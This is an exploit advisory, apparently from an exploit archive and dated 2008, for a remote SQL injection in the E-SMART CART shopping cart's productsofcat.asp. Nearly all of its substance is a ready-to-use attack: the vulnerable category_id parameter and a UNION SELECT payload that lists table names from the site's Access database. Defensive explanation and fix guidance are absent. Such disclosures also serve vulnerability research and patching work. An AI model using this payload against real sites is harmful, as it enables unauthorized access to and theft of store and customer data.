id: 3173
date: 06/12/2008
title: E-SMART CART (productsofcat.asp) Remote SQL Injection Vulnerability
author: JosS
cves: 

===================================================================
E-SMART CART (productsofcat.asp) Remote SQL Injection Vulnerability
===================================================================



[+] Info:

[~] Bug found by JosS
[~] EspSeC & Hack0wn!.

[~] Software: E-SMART CART (payment)
[~] HomePage: http://www.preproject.com/
[~] Exploit: Remote SQL Injection [High]
[~] Vuln file: productsofcat.asp

[~] /store/productsofcat.asp?p=1&category_id=[SQL]

[+] Exploit:

[~] http://localhost/PATH/store/productsofcat.asp?p=1&category_id=[SQL]
[~] 22+and+1=2+union+all+select+1,name,3,0+from+msysobjects



#  0day.today [2023-03-25]  #